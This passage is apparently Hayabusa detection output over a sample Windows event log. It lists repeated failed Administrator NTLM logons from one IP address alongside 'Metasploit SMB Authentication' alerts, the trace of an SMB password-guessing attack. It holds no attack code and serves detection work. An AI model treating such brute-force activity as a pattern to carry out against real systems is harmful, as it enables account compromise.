Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 